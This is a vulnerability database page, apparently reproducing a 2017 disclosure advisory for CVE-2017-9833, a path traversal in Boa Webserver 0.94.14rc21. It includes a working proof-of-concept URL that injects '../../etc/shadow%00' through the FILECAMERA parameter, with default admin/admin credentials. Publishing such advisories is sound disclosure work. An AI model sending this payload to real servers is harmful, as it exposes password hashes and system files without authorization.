Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2017-9833

Publish Date: 03 Jul 2017

Source

                							

                BOA Web Server 0.94.14 - Access to arbitrary files as privileges
 
Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833
 
 
Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials
 
Vulnerable variable:
FILECAMERA=../../etc/shadow%00
 
Exploit link:
/cgi-bin/wapopen?B1=OK&amp;NO=CAM_16&amp;REFRESH_TIME=Auto_00&amp;FILECAMERA=../../etc/shadow%00&amp;REFRESH_HTML=auto.htm&amp;ONLOAD_HTML=onload.htm&amp;STREAMING_HTML=streaming.htm&amp;NAME=admin&amp;PWD=admin&amp;PIC_SIZE=0
 
Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&amp;NO=CAM_16&amp;REFRESH_TIME=Auto_00&amp;FILECAMERA=../../etc/shadow%00&amp;REFRESH_HTML=auto.htm&amp;ONLOAD_HTML=onload.htm&amp;STREAMING_HTML=streaming.htm&amp;NAME=admin&amp;PWD=admin&amp;PIC_SIZE=0

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

BOA Web Server 0.94.14rc21 Arbitrary File Access

Vulmon Search

About

Products

Connect